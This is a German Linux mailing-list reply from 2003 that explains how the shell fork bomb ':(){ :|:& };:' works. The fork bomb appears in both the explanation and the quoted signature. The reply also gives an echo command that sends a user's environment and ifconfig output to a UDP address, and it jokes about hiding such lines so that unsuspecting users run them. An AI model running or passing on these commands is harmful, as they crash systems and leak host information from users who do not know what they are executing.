[linux-l] Re: [linux-l] Re: [linux-l] nach Kernelupdate sieht top-Ausgabe merkwürdig!

Schlomo Schapiro belug at schapiro.org
Fr Mai 23 14:13:28 CEST 2003 

Hello Volker,

schade, daß Du Sachen in der sig hast, die Du nicht verstehst.

Der Inhalt ist immer, eine rekursive Funktion ohne Abbruchbedingung zu
bauen die sich dann bis der Speicher voll ist aufruft. Der Trick dabei ist
jedoch, das so zu machen, daß der Otto-Normal-User das nicht erkennt.

Z.B: :(){ :|:& };:

: ist eigentlich ein eingebauter Befehl der garnix tut:
schapiro at HOOP:~>help :
:: :
    No effect; the command does nothing.  A zero exit code is returned.

In der sig wird jedoch : als funktion neu definiert
(durch :() { ... code ...}) und dannach gleich ausgeführt (durch ;:
angehängt). Die : funktion ruft sich selbst zweimal auf und zwar mit & im
Hintergrund. D.h. daß : ständig neu aufgerufen wird und da es sich zweimal pro
Aufruf selbst aufruft, steigt die Zahl der gleichzeit laufenden
Shell-Prozesse fast exponential an, fertig ist die fork-Bombe. Die heißt so
weil Unix das & durch einen fork() intern macht.

Deine sig tut doch das gleiche, nur mit einer Datei statt einer Funktion
(das mit der Funktion find ich schlauer). Der dummy sollte es halt nicht
verstehen und ausführen.

Interressanter find ich schon die Dinger, die dann auch noch dem Sender das
per Netzwerk mitteilen, z.B. mit
echo -e "Dummen gefunden:\n`set`\n`ifconfig`\n" >/dev/udp/192.168.1.1/112233

(natürlich irgendwie sinnvoll versteckt) :-)

Schlomo

Friday, May 23, 2003, 11:26:24 AM, you wrote:

> Am Fri, 23 May 2003 08:21:30 +0000 (UTC) schrieb Steffen Dettmer: 
>> * Kendy Kutzner wrote on Thu, May 22, 2003 at 10:54 +0200:
>>> PS: Falco, was funktioniert an der Signatur nicht?
>>> -- 
>>> #!/bin/sh
>>> :(){ :|:& };:
>> 
>> Ist doch so ne Fork-Bombe? Warum hängst Du das als Deine sig an?
>> Weil man bei Linux keine Viren verschicken kann, vermute ich. Ich
>> find es doof, absichtlich Viren zu verschicken.

> Ist doch kein Virus.

> Mich wuerde eher die Funktionsweise interessieren. Die ist mir naemlich
> auch nach dem zweiten Hinsehen noch nicht ganz klar.

> BTW: Meine Sig solltest Du ebenfalls nicht ausfuehren - nur so, damit Du
> Dich nicht hinterher beschwerst ...

> Gruss, Volker



-- 
Best regards,
 Schlomo

Mehr Informationen über die Mailingliste linux-l